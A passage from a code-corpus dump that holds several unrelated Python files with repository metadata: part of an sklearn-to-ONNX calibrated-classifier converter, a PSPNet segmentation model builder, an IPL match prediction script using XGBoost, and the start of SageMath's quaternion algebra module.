# ARRAYFEATUREEXTRACTOR <- k [1] -> ARRAYFEATUREEXTRACTOR
# | |
# V V
# transposed_df_col[M, 1] transposed_df_col[M, 1]
# |--------------------------|----------.--------------------------.
# | | | |
# |if model.method='sigmoid' | |if model.method='isotonic'|
# | | | |
# V V |if out_of_bounds='clip' |
# MUL <-------- a --------> MUL V V
# | | CLIP ... CLIP
# V V | |
# a_df_prod [M, 1] ... a_df_prod [M, 1] V V
# | | clipped_df [M, 1]...clipped_df [M, 1]
# V V | |
# ADD <--------- b ---------> ADD '-------------------.------'
# | | |
# V V |
# exp_parameter [M, 1] ... exp_parameter [M, 1] |
# | | |
# V V |
# EXP ... EXP |
# | | |
# V V |
# exp_result [M, 1] ... exp_result [M, 1] |
# | | |
# V V |
# ADD <------- unity -------> ADD |
# | | |
# V V |
# denominator [M, 1] ... denominator [M, 1] |
# | | |
# V V |
# DIV <------- unity ------> DIV |
# | | |
# V V |
# sigmoid_predict_result [M, 1] ... sigmoid_predict_result [M, 1] |
# | | |
# '-----.--------------------' |
# |-------------------------------------------------'
# |
# V
# CONCAT -> concatenated_prob [M, C]
# |
# if C = 2 | if C != 2
# .-------------------'---------------------------.---------.
# | | |
# V | V
# ARRAYFEATUREEXTRACTOR <- col_number [1] | REDUCESUM
# | | |
# '--------------------------------. | |
# unit_float_tensor [1] -> SUB <- first_col [M, 1] <-' | |
# | / |
# V V V
# CONCAT DIV <- reduced_prob [M]
# | |
# V |
# class_prob_tensor [M, C] <--'
if scope.get_options(operator.raw_operator, dict(nocl=False))['nocl']:
raise RuntimeError(
"Option 'nocl' is not implemented for operator '{}'.".format(
operator.raw_operator.__class__.__name__))
base_model = model.base_estimator
op_type = sklearn_operator_name_map[type(base_model)]
n_classes = len(model.classes_)
prob_name = [None] * n_classes
this_operator = scope.declare_local_operator(op_type)
this_operator.raw_operator = base_model
if container.has_options(base_model, 'raw_scores'):
container.add_options(id(base_model), {'raw_scores': True})
this_operator.inputs = operator.inputs
label_name = scope.declare_local_variable('label')
df_name = scope.declare_local_variable('probability_tensor',
FloatTensorType())
this_operator.outputs.append(label_name)
this_operator.outputs.append(df_name)
df_inp = df_name.full_name
for k in range(n_classes):
cur_k = k
if n_classes == 2:
cur_k += 1
# In case of binary classification, SVMs only return
# scores for the positive class. We concat the same
# column twice as we just use the second column.
if op_type in ('SklearnLinearSVC', 'SklearnSVC'):
df_input_name = scope.get_unique_variable_name('df_input')
merged_input_name = scope.get_unique_variable_name(
'merged_input')
apply_reshape(scope, df_inp,
df_input_name, container,
desired_shape=(-1, 1))
apply_concat(scope, [df_input_name, df_input_name],
merged_input_name, container, axis=1)
df_inp = merged_input_name
k_name = scope.get_unique_variable_name('k')
df_col_name = scope.get_unique_variable_name('transposed_df_col')
prob_name[k] = scope.get_unique_variable_name('prob_{}'.format(k))
container.add_initializer(k_name, onnx_proto.TensorProto.INT64,
[], [cur_k])
container.add_node(
'ArrayFeatureExtractor', [df_inp, k_name], df_col_name,
name=scope.get_unique_operator_name('ArrayFeatureExtractor'),
op_domain='ai.onnx.ml')
T = (_transform_sigmoid(scope, container, model, df_col_name, k)
if model.method == 'sigmoid' else
_transform_isotonic(scope, container, model, df_col_name, k))
prob_name[k] = T
if n_classes == 2:
break
if n_classes == 2:
zeroth_col_name = scope.get_unique_variable_name('zeroth_col')
merged_prob_name = scope.get_unique_variable_name('merged_prob')
unit_float_tensor_name = scope.get_unique_variable_name(
'unit_float_tensor')
container.add_initializer(unit_float_tensor_name,
onnx_proto.TensorProto.FLOAT, [], [1.0])
apply_sub(scope, [unit_float_tensor_name, prob_name[0]],
zeroth_col_name, container, broadcast=1)
apply_concat(scope, [zeroth_col_name, prob_name[0]],
merged_prob_name, container, axis=1)
class_prob_tensor_name = merged_prob_name
else:
concatenated_prob_name = scope.get_unique_variable_name(
'concatenated_prob')
reduced_prob_name = scope.get_unique_variable_name('reduced_prob')
calc_prob_name = scope.get_unique_variable_name('calc_prob')
apply_concat(scope, prob_name, concatenated_prob_name,
container, axis=1)
container.add_node('ReduceSum', concatenated_prob_name,
reduced_prob_name, axes=[1],
name=scope.get_unique_operator_name('ReduceSum'))
num, deno = _handle_zeros(scope, container, concatenated_prob_name,
reduced_prob_name, n_classes)
apply_div(scope, [num, deno],
calc_prob_name, container, broadcast=1)
class_prob_tensor_name = calc_prob_name
return class_prob_tensor_name
def convert_sklearn_calibrated_classifier_cv(scope, operator, container):
# Computational graph:
#
# In the following graph, variable names are in lower case characters only
# and operator names are in upper case characters. We borrow operator names
# from the official ONNX spec:
# https://github.com/onnx/onnx/blob/master/docs/Operators.md
# All variables are followed by their shape in [].
#
# Symbols:
# M: Number of instances
# N: Number of features
# C: Number of classes
# CONVERT_BASE_ESTIMATOR: base estimator convert function defined above
# clf_length: number of calibrated classifiers
# input: input
# output: output
# class_prob: class probabilities
#
# Graph:
#
# input [M, N]
# |
# .-------------------|--------------------------.
# | | |
# V V V
# CONVERT_BASE_ESTIMATOR CONVERT_BASE_ESTIMATOR ... CONVERT_BASE_ESTIMATOR
# | | |
# V V V
# prob_scores_0 [M, C] prob_scores_1 [M, C] ... prob_scores_(clf_length-1)
# | | | [M, C]
# '-------------------|--------------------------'
# V
# add_result [M, C] <--- SUM
# |
# '--> DIV <- clf_length [1]
# |
# V
# class_prob [M, C] -> ARGMAX -> argmax_output [M, 1]
# |
# classes -> ARRAYFEATUREEXTRACTOR <---'
# |
# V
# output [1]
op = operator.raw_operator
classes = op.classes_
output_shape = (-1,)
class_type = onnx_proto.TensorProto.STRING
if np.issubdtype(op.classes_.dtype, np.floating):
class_type = onnx_proto.TensorProto.INT32
classes = classes.astype(np.int32)
elif np.issubdtype(op.classes_.dtype, np.signedinteger):
class_type = onnx_proto.TensorProto.INT32
else:
classes = np.array([s.encode('utf-8') for s in classes])
clf_length = len(op.calibrated_classifiers_)
prob_scores_name = []
clf_length_name = scope.get_unique_variable_name('clf_length')
classes_name = scope.get_unique_variable_name('classes')
reshaped_result_name = scope.get_unique_variable_name('reshaped_result')
argmax_output_name = scope.get_unique_variable_name('argmax_output')
array_feature_extractor_result_name = scope.get_unique_variable_name(
'array_feature_extractor_result')
add_result_name = scope.get_unique_variable_name('add_result')
container.add_initializer(classes_name, class_type, classes.shape, classes)
container.add_initializer(clf_length_name, onnx_proto.TensorProto.FLOAT,
[], [clf_length])
for clf in op.calibrated_classifiers_:
prob_scores_name.append(convert_calibrated_classifier_base_estimator(
scope, operator, container, clf))
container.add_node('Sum', [s for s in prob_scores_name],
add_result_name, op_version=7,
name=scope.get_unique_operator_name('Sum'))
apply_div(scope, [add_result_name, clf_length_name],
operator.outputs[1].full_name, container, broadcast=1)
class_prob_name = operator.outputs[1].full_name
container.add_node('ArgMax', class_prob_name,
argmax_output_name,
name=scope.get_unique_operator_name('ArgMax'), axis=1)
container.add_node(
'ArrayFeatureExtractor', [classes_name, argmax_output_name],
array_feature_extractor_result_name, op_domain='ai.onnx.ml',
name=scope.get_unique_operator_name('ArrayFeatureExtractor'))
if class_type == onnx_proto.TensorProto.INT32:
apply_reshape(scope, array_feature_extractor_result_name,
reshaped_result_name, container,
desired_shape=output_shape)
apply_cast(scope, reshaped_result_name, operator.outputs[0].full_name,
container, to=onnx_proto.TensorProto.INT64)
else:
apply_reshape(scope, array_feature_extractor_result_name,
operator.outputs[0].full_name, container,
desired_shape=output_shape)
register_converter('SklearnCalibratedClassifierCV',
convert_sklearn_calibrated_classifier_cv,
options={'zipmap': [True, False],
'nocl': [True, False]})
| 48.06264
| 79
| 0.536166
|
e81828f108550aa8928e6250be1e8664abb0ecb0
| 4,892
|
py
|
Python
|
MaksimovKA_solution/models/qubvel_segmentation_models/pspnet/model.py
|
ktncktnc/SpaceNet_Off_Nadir_Solutions
|
2a9ef1c3b72fb749c808ddb8593a85cb16b9f1ca
|
[
"Apache-2.0"
] | 164
|
2019-01-31T16:37:09.000Z
|
2022-03-31T02:47:49.000Z
|
MaksimovKA_solution/models/qubvel_segmentation_models/pspnet/model.py
|
xiaofanglegoc/SpaceNet_Off_Nadir_Solutions
|
812f151d244565f29987ebec7683ef42622ae16e
|
[
"Apache-2.0"
] | 3
|
2019-11-20T03:32:29.000Z
|
2021-12-20T05:52:50.000Z
|
MaksimovKA_solution/models/qubvel_segmentation_models/pspnet/model.py
|
xiaofanglegoc/SpaceNet_Off_Nadir_Solutions
|
812f151d244565f29987ebec7683ef42622ae16e
|
[
"Apache-2.0"
] | 36
|
2019-02-08T19:12:35.000Z
|
2021-12-23T06:52:35.000Z
|
from .builder import build_psp
from ..utils import freeze_model
from ..backbones import get_backbone
PSP_BASE_LAYERS = {
'vgg16': ('block5_conv3', 'block4_conv3', 'block3_conv3'),
'vgg19': ('block5_conv4', 'block4_conv4', 'block3_conv4'),
'resnet18': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnet34': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnet50': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnet101': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnet152': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnext50': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnext101': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'inceptionv3': (228, 86, 16),
'inceptionresnetv2': (594, 260, 16),
'densenet121': (311, 139, 51),
'densenet169': (367, 139, 51),
'densenet201': (479, 139, 51),
}
def _get_layer_by_factor(backbone_name, factor):
if factor == 4:
return PSP_BASE_LAYERS[backbone_name][-1]
elif factor == 8:
return PSP_BASE_LAYERS[backbone_name][-2]
elif factor == 16:
return PSP_BASE_LAYERS[backbone_name][-3]
else:
raise ValueError('Unsupported factor - `{}`, Use 4, 8 or 16.'.format(factor))
def _shape_guard(factor, shape):
h, w = shape[:2]
min_size = factor * 6
res = (h % min_size != 0 or w % min_size != 0 or
h < min_size or w < min_size)
if res:
raise ValueError('Wrong shape {}, input H and W should '.format(shape) +
'be divisible by `{}`'.format(min_size))
def PSPNet(backbone_name='vgg16',
input_shape=(384, 384, 3),
input_tensor=None,
encoder_weights='imagenet',
freeze_encoder=False,
downsample_factor=8,
psp_conv_filters=512,
psp_pooling_type='avg',
use_batchnorm=False,
dropout=None,
final_interpolation='bilinear',
classes=21,
activation='softmax'):
"""
Exploit the capability of global context information by different-regionbased
context aggregation through pyramid pooling module together with the proposed
pyramid scene parsing network (PSPNet).
https://arxiv.org/pdf/1612.01105.pdf
Args:
backbone_name: (str) look at list of available backbones.
input_shape: (tuple) dimensions of input data (H, W, C).
H and W should be divisible by (6 * `downsample_factor`) and **NOT** `None`!
input_tensor: keras tensor
encoder_weights: one of `None` (random initialization), 'imagenet' (pre-
training on ImageNet)
freeze_encoder: (bool) Set encoder layers weights as non-trainable. Use-
ful for fine-tuning
downsample_factor: int, one of 4, 8 and 16. Specify layer of backbone or
backbone depth to construct PSP module on it.
psp_conv_filters: (int), number of filters in `Conv2D` layer in each psp block
psp_pooling_type: 'avg' or 'max', psp block pooling type (maximum or average)
use_batchnorm: (bool) if True add batch normalisation layer between
`Conv2D` ad `Activation` layers
dropout: None or float in range 0-1, if specified add SpatialDropout after PSP module
final_interpolation: 'duc' or 'bilinear' - interpolation type for final
upsampling layer.
classes: (int) a number of classes for output
activation: (str) one of keras activations
Returns:
keras Model instance
"""
# control image input shape
_shape_guard(downsample_factor, input_shape)
backbone = get_backbone(backbone_name,
input_shape=input_shape,
input_tensor=input_tensor,
weights=encoder_weights,
include_top=False)
psp_layer = _get_layer_by_factor(backbone_name, downsample_factor)
model = build_psp(backbone,
psp_layer,
last_upsampling_factor=downsample_factor,
classes=classes,
conv_filters=psp_conv_filters,
pooling_type=psp_pooling_type,
activation=activation,
use_batchnorm=use_batchnorm,
dropout=dropout,
final_interpolation=final_interpolation)
# lock encoder weights for fine-tuning
if freeze_encoder:
freeze_model(backbone)
model.name = 'psp-{}'.format(backbone_name)
return model
| 40.429752
| 95
| 0.612837
|
0072acb74b687e224cf9168fd48d2c02ccaed7eb
| 2,334
|
py
|
Python
|
main.py
|
keshav-b/Hala-IPL
|
b17aa9c27e78c7b19977eb6115a8b80992acab22
|
[
"MIT"
] | 1
|
2019-08-17T07:23:56.000Z
|
2019-08-17T07:23:56.000Z
|
main.py
|
keshav-b/IPL-Prediction
|
b17aa9c27e78c7b19977eb6115a8b80992acab22
|
[
"MIT"
] | null | null | null |
main.py
|
keshav-b/IPL-Prediction
|
b17aa9c27e78c7b19977eb6115a8b80992acab22
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn import svm
from sklearn.preprocessing import LabelEncoder
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import f1_score
from xgboost import XGBClassifier
import matplotlib.pyplot
#importing the dataset
data = pd.read_csv('matches.csv')
data1 = data
#checking if there are any missing data
miss_bool = data['winner'].isnull()
print(sum(miss_bool))
#dropping those rows with NULL values
data = data.dropna(how = 'all')
#dropping thoses columns which arent making sense
data = data.drop(['dl_applied','umpire1','id','umpire2','umpire3','date','win_by_runs',
'win_by_wickets','player_of_match','result','city','season','venue'], axis=1)
#replace
data = data.replace('Rising Pune Supergiants', 'Rising Pune Supergiant')
#encoding the values using label encoder
le = LabelEncoder()
cols = ['team1','team2','winner','toss_winner','toss_decision']
for i in cols:
data[i] = le.fit_transform(data[i])
#spilttinig into X and y
x = data.drop(['winner'],axis=1)
y = data['winner']
teams = ['Royal Challengers Bangalore',
'Sunrisers Hyderabad',
'Rajasthan Royals',
'Mumbai Indians',
'Kolkata Knight Riders',
'Kings XI Punjab',
'Delhi Capitals',
'Chennai Super Kings',
'Gujarat Lions',
'Rising Pune Supergiant',
'Pune Warriors India',
'Kochi Tuskers Kerala',
'Deccan Chargers']
teams.sort()
teams_le = le.fit_transform(teams)
#Test Teain Split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=.30, random_state=1008)
#--------------------------------------SVM
'''
svm = svm.SVC(gamma = 'scale')
svm.fit(x_train, y_train)
y_pred = svm.predict(x_test)
print(f1_score(y_test,y_pred, average='micro'))
#--------------------------------------Random Forest
classifier = RandomForestClassifier(n_estimators = 10, criterion = 'entropy', random_state = 0)
classifier.fit(x_train, y_train)
y_pred1 = classifier.predict(x_test)
print(f1_score(y_test,y_pred1,average='micro'))
'''
#--------------------------------------XGBoosr
xg = XGBClassifier()
xg.fit(x_train, y_train)
y_pred2 = xg.predict(x_test)
print("The F1 Score of the XGBoost is: ",f1_score(y_test,y_pred2,average='micro'))
import pickle
with open('model.pickle','wb') as k:
pickle.dump(xg,k)
| 26.224719
| 95
| 0.70437
|
43acdc7566deb1d35a1b253470c98b6a46510aca
| 105,444
|
py
|
Python
|
src/sage/algebras/quatalg/quaternion_algebra.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/quatalg/quaternion_algebra.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/quatalg/quaternion_algebra.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
"""
Quaternion Algebras
AUTHORS:
- Jon Bobber (2009): rewrite
- William Stein (2009): rewrite
- Julian Rueth (2014-03-02): use UniqueFactory for caching
This code is partly based on Sage code by David Kohel from 2005.
TESTS:
Pickling test::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-5,-2)
sage: Q == loads(dumps(Q))
True
"""
#*****************************************************************************
# Copyright (C) 2009 William Stein <wstein@gmail.com>
# Copyright (C) 2009 Jonathan Bober <jwbober@gmail.com>
# Copyright (C) 2014 Julian Rueth <julian.rueth@fsfe.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import print_function
from sage.arith.all import (hilbert_conductor_inverse, hilbert_conductor,
factor, gcd, lcm, kronecker_symbol, valuation)
from sage.rings.all import RR, Integer
from sage.rings.integer_ring import ZZ
from sage.rings.rational import Rational
from sage.rings.finite_rings.finite_field_constructor import GF
from sage.rings.ring import Algebra
from sage.rings.ideal import Ideal_fractional
from sage.rings.rational_field import is_RationalField, QQ
from sage.rings.infinity import infinity
from sage.rings.number_field.number_field import is_NumberField
from sage.structure.category_object import normalize_names
from sage.structure.parent_gens import ParentWithGens
from sage.matrix.matrix_space import MatrixSpace
from sage.matrix.constructor import diagonal_matrix, matrix
from sage.structure.sequence import Sequence
from sage.structure.element import is_RingElement
from sage.structure.factory import UniqueFactory
from sage.modules.free_module import VectorSpace, FreeModule
from sage.modules.free_module_element import vector
from operator import itemgetter
import quaternion_algebra_element
import quaternion_algebra_cython
from sage.modular.modsym.p1list import P1List
from sage.misc.cachefunc import cached_method
from sage.categories.fields import Fields
_Fields = Fields()
########################################################
# Constructor
########################################################
class QuaternionAlgebraFactory(UniqueFactory):
"""
There are three input formats:
- ``QuaternionAlgebra(a, b)``: quaternion algebra generated by ``i``, ``j``
subject to `i^2 = a`, `j^2 = b`, `j \cdot i = -i \cdot j`.
- ``QuaternionAlgebra(K, a, b)``: same as above but over a field ``K``.
Here, ``a`` and ``b`` are nonzero elements of a field (``K``) of
characteristic not 2, and we set `k = i \cdot j`.
- ``QuaternionAlgebra(D)``: a rational quaternion algebra with
discriminant ``D``, where `D > 1` is a squarefree integer.
EXAMPLES:
``QuaternionAlgebra(a, b)`` - return quaternion algebra over the
*smallest* field containing the nonzero elements ``a`` and ``b`` with
generators ``i``, ``j``, ``k`` with `i^2=a`, `j^2=b` and `j \cdot i =
-i \cdot j`::
sage: QuaternionAlgebra(-2,-3)
Quaternion Algebra (-2, -3) with base ring Rational Field
sage: QuaternionAlgebra(GF(5)(2), GF(5)(3))
Quaternion Algebra (2, 3) with base ring Finite Field of size 5
sage: QuaternionAlgebra(2, GF(5)(3))
Quaternion Algebra (2, 3) with base ring Finite Field of size 5
sage: QuaternionAlgebra(QQ[sqrt(2)](-1), -5)
Quaternion Algebra (-1, -5) with base ring Number Field in sqrt2 with defining polynomial x^2 - 2
sage: QuaternionAlgebra(sqrt(-1), sqrt(-3))
Quaternion Algebra (I, sqrt(-3)) with base ring Symbolic Ring
sage: QuaternionAlgebra(1r,1)
Quaternion Algebra (1, 1) with base ring Rational Field
Python ints, longs and floats may be passed to the
``QuaternionAlgebra(a, b)`` constructor, as may all pairs of nonzero
elements of a ring not of characteristic 2. The following tests address
the issues raised in :trac:`10601`::
sage: QuaternionAlgebra(1r,1)
Quaternion Algebra (1, 1) with base ring Rational Field
sage: QuaternionAlgebra(1,1.0r)
Quaternion Algebra (1.00000000000000, 1.00000000000000) with base ring Real Field with 53 bits of precision
sage: QuaternionAlgebra(0,0)
Traceback (most recent call last):
...
ValueError: a and b must be nonzero
sage: QuaternionAlgebra(GF(2)(1),1)
Traceback (most recent call last):
...
ValueError: a and b must be elements of a ring with characteristic not 2
sage: a = PermutationGroupElement([1,2,3])
sage: QuaternionAlgebra(a, a)
Traceback (most recent call last):
...
ValueError: a and b must be elements of a ring with characteristic not 2
``QuaternionAlgebra(K, a, b)`` - return quaternion algebra over the
field ``K`` with generators ``i``, ``j``, ``k`` with `i^2=a`, `j^2=b`
and `i \cdot j = -j \cdot i`::
sage: QuaternionAlgebra(QQ, -7, -21)
Quaternion Algebra (-7, -21) with base ring Rational Field
sage: QuaternionAlgebra(QQ[sqrt(2)], -2,-3)
Quaternion Algebra (-2, -3) with base ring Number Field in sqrt2 with defining polynomial x^2 - 2
``QuaternionAlgebra(D)`` - ``D`` is a squarefree integer; returns a
rational quaternion algebra of discriminant ``D``::
sage: QuaternionAlgebra(1)
Quaternion Algebra (-1, 1) with base ring Rational Field
sage: QuaternionAlgebra(2)
Quaternion Algebra (-1, -1) with base ring Rational Field
sage: QuaternionAlgebra(7)
Quaternion Algebra (-1, -7) with base ring Rational Field
sage: QuaternionAlgebra(2*3*5*7)
Quaternion Algebra (-22, 210) with base ring Rational Field
If the coefficients `a` and `b` in the definition of the quaternion
algebra are not integral, then a slower generic type is used for
arithmetic::
sage: type(QuaternionAlgebra(-1,-3).0)
<type 'sage.algebras.quatalg.quaternion_algebra_element.QuaternionAlgebraElement_rational_field'>
sage: type(QuaternionAlgebra(-1,-3/2).0)
<type 'sage.algebras.quatalg.quaternion_algebra_element.QuaternionAlgebraElement_generic'>
Make sure caching is sane::
sage: A = QuaternionAlgebra(2,3); A
Quaternion Algebra (2, 3) with base ring Rational Field
sage: B = QuaternionAlgebra(GF(5)(2),GF(5)(3)); B
Quaternion Algebra (2, 3) with base ring Finite Field of size 5
sage: A is QuaternionAlgebra(2,3)
True
sage: B is QuaternionAlgebra(GF(5)(2),GF(5)(3))
True
sage: Q = QuaternionAlgebra(2); Q
Quaternion Algebra (-1, -1) with base ring Rational Field
sage: Q is QuaternionAlgebra(QQ,-1,-1)
True
sage: Q is QuaternionAlgebra(-1,-1)
True
sage: Q.<ii,jj,kk> = QuaternionAlgebra(15); Q.variable_names()
('ii', 'jj', 'kk')
sage: QuaternionAlgebra(15).variable_names()
('i', 'j', 'k')
TESTS:
Verify that bug found when working on :trac:`12006` involving coercing
invariants into the base field is fixed::
sage: Q = QuaternionAlgebra(-1,-1); Q
Quaternion Algebra (-1, -1) with base ring Rational Field
sage: parent(Q._a)
Rational Field
sage: parent(Q._b)
Rational Field
"""
def create_key(self, arg0, arg1=None, arg2=None, names='i,j,k'):
"""
Create a key that uniquely determines a quaternion algebra.
TESTS::
sage: QuaternionAlgebra.create_key(-1,-1)
(Rational Field, -1, -1, ('i', 'j', 'k'))
"""
# QuaternionAlgebra(D)
if arg1 is None and arg2 is None:
K = QQ
D = Integer(arg0)
a, b = hilbert_conductor_inverse(D)
a = Rational(a); b = Rational(b)
elif arg2 is None:
# If arg0 or arg1 are Python data types, coerce them
# to the relevant Sage types. This is a bit inelegant.
L = []
for a in [arg0,arg1]:
if is_RingElement(a):
L.append(a)
elif isinstance(a, int) or isinstance(a, long):
L.append(Integer(a))
elif isinstance(a, float):
L.append(RR(a))
else:
raise ValueError("a and b must be elements of a ring with characteristic not 2")
# QuaternionAlgebra(a, b)
v = Sequence(L)
K = v.universe().fraction_field()
a = K(v[0])
b = K(v[1])
# QuaternionAlgebra(K, a, b)
else:
K = arg0
if K not in _Fields:
raise TypeError("base ring of quaternion algebra must be a field")
a = K(arg1)
b = K(arg2)
if K.characteristic() == 2:
# Lameness!
raise ValueError("a and b must be elements of a ring with characteristic not 2")
if a == 0 or b == 0:
raise ValueError("a and b must be nonzero")
names = normalize_names(3, names)
return (K, a, b, names)
def create_object(self, version, key, **extra_args):
"""
Create the object from the key (extra arguments are ignored). This is
only called if the object was not found in the cache.
TESTS::
sage: QuaternionAlgebra.create_object("6.0", (QQ, -1, -1, ('i', 'j', 'k')))
Quaternion Algebra (-1, -1) with base ring Rational Field
"""
K, a, b, names = key
return QuaternionAlgebra_ab(K, a, b, names=names)
QuaternionAlgebra = QuaternionAlgebraFactory("QuaternionAlgebra")
########################################################
# Classes
########################################################
def is_QuaternionAlgebra(A):
"""
Return ``True`` if ``A`` is of the QuaternionAlgebra data type.
EXAMPLES::
sage: sage.algebras.quatalg.quaternion_algebra.is_QuaternionAlgebra(QuaternionAlgebra(QQ,-1,-1))
True
sage: sage.algebras.quatalg.quaternion_algebra.is_QuaternionAlgebra(ZZ)
False
"""
return isinstance(A, QuaternionAlgebra_abstract)
class QuaternionAlgebra_abstract(Algebra):
def _repr_(self):
"""
EXAMPLES::
sage: sage.algebras.quatalg.quaternion_algebra.QuaternionAlgebra_abstract(QQ)._repr_()
'Quaternion Algebra with base ring Rational Field'
"""
return "Quaternion Algebra with base ring %s"%self.base_ring()
def ngens(self):
"""
Return the number of generators of the quaternion algebra as a K-vector
space, not including 1. This value is always 3: the algebra is spanned
by the standard basis `1`, `i`, `j`, `k`.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-5,-2)
sage: Q.ngens()
3
sage: Q.gens()
[i, j, k]
"""
return 3
def basis(self):
"""
Return the fixed basis of ``self``, which is `1`, `i`, `j`, `k`, where
`i`, `j`, `k` are the generators of ``self``.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-5,-2)
sage: Q.basis()
(1, i, j, k)
sage: Q.<xyz,abc,theta> = QuaternionAlgebra(GF(9,'a'),-5,-2)
sage: Q.basis()
(1, xyz, abc, theta)
The basis is cached::
sage: Q.basis() is Q.basis()
True
"""
try:
return self.__basis
except AttributeError:
self.__basis = tuple([self(1)] + list(self.gens()))
return self.__basis
def inner_product_matrix(self):
"""
Return the inner product matrix associated to ``self``, i.e. the
Gram matrix of the reduced norm as a quadratic form on ``self``.
The standard basis `1`, `i`, `j`, `k` is orthogonal, so this matrix
is just the diagonal matrix with diagonal entries `2`, `2a`, `2b`,
`2ab`.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(-5,-19)
sage: Q.inner_product_matrix()
[ 2 0 0 0]
[ 0 10 0 0]
[ 0 0 38 0]
[ 0 0 0 190]
"""
try: return self.__inner_product_matrix
except AttributeError: pass
a, b = self._a, self._b
M = diagonal_matrix(self.base_ring(), [2, -2*a, -2*b, 2*a*b])
M.set_immutable()
self.__inner_product_matrix = M
return M
def is_commutative(self):
"""
Return ``False`` always, since all quaternion algebras are
noncommutative.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3,-7)
sage: Q.is_commutative()
False
"""
return False
def is_division_algebra(self):
"""
Return ``True`` if the quaternion algebra is a division algebra (i.e.
every nonzero element in ``self`` is invertible), and ``False`` if the
quaternion algebra is isomorphic to the 2x2 matrix algebra.
EXAMPLES::
sage: QuaternionAlgebra(QQ,-5,-2).is_division_algebra()
True
sage: QuaternionAlgebra(1).is_division_algebra()
False
sage: QuaternionAlgebra(2,9).is_division_algebra()
False
sage: QuaternionAlgebra(RR(2.),1).is_division_algebra()
Traceback (most recent call last):
...
NotImplementedError: base field must be rational numbers
"""
if not is_RationalField(self.base_ring()):
raise NotImplementedError("base field must be rational numbers")
return self.discriminant() != 1
def is_matrix_ring(self):
"""
Return ``True`` if the quaternion algebra is isomorphic to the 2x2
matrix ring, and ``False`` if ``self`` is a division algebra (i.e.
every nonzero element in ``self`` is invertible).
EXAMPLES::
sage: QuaternionAlgebra(QQ,-5,-2).is_matrix_ring()
False
sage: QuaternionAlgebra(1).is_matrix_ring()
True
sage: QuaternionAlgebra(2,9).is_matrix_ring()
True
sage: QuaternionAlgebra(RR(2.),1).is_matrix_ring()
Traceback (most recent call last):
...
NotImplementedError: base field must be rational numbers
"""
if not is_RationalField(self.base_ring()):
raise NotImplementedError("base field must be rational numbers")
return self.discriminant() == 1
def is_exact(self):
"""
Return ``True`` if elements of this quaternion algebra are represented
exactly, i.e. there is no precision loss when doing arithmetic. A
quaternion algebra is exact if and only if its base field is
exact.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_exact()
True
sage: Q.<i,j,k> = QuaternionAlgebra(Qp(7), -3, -7)
sage: Q.is_exact()
False
"""
return self.base_ring().is_exact()
def is_field(self, proof = True):
"""
Return ``False`` always, since all quaternion algebras are
noncommutative and all fields are commutative.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_field()
False
"""
return False
def is_finite(self):
"""
Return ``True`` if the quaternion algebra is finite as a set.
Algorithm: A quaternion algebra is finite if and only if the
base field is finite.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_finite()
False
sage: Q.<i,j,k> = QuaternionAlgebra(GF(5), -3, -7)
sage: Q.is_finite()
True
"""
return self.base_ring().is_finite()
def is_integral_domain(self, proof = True):
"""
Return ``False`` always, since all quaternion algebras are
noncommutative and integral domains are commutative (in Sage).
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_integral_domain()
False
"""
return False
def is_noetherian(self):
"""
Return ``True`` always, since any quaternion algebra is a noetherian
ring (because it is a finitely generated module over a field).
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_noetherian()
True
"""
return True
def order(self):
"""
Return the number of elements of the quaternion algebra, or
``+Infinity`` if the algebra is not finite.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.order()
+Infinity
sage: Q.<i,j,k> = QuaternionAlgebra(GF(5), -3, -7)
sage: Q.order()
625
"""
return (self.base_ring().order())**4
def random_element(self, *args, **kwds):
"""
Return a random element of this quaternion algebra.
The ``args`` and ``kwds`` are passed to the ``random_element`` method
of the base ring.
EXAMPLES::
sage: QuaternionAlgebra(QQ[sqrt(2)],-3,7).random_element()
(sqrt2 + 2)*i + (-12*sqrt2 - 2)*j + (-sqrt2 + 1)*k
sage: QuaternionAlgebra(-3,19).random_element()
-1 + 2*i - j - 6/5*k
sage: QuaternionAlgebra(GF(17)(2),3).random_element()
14 + 10*i + 4*j + 7*k
Specify the numerator and denominator bounds::
sage: QuaternionAlgebra(-3,19).random_element(10^6,10^6)
-979933/553629 + 255525/657688*i - 3511/6929*j - 700105/258683*k
"""
